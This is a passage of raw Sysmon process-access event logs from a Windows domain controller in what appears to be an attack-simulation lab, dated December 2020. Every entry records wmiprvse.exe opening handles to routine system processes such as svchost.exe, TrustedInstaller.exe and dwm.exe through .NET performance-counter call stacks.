.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.670{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 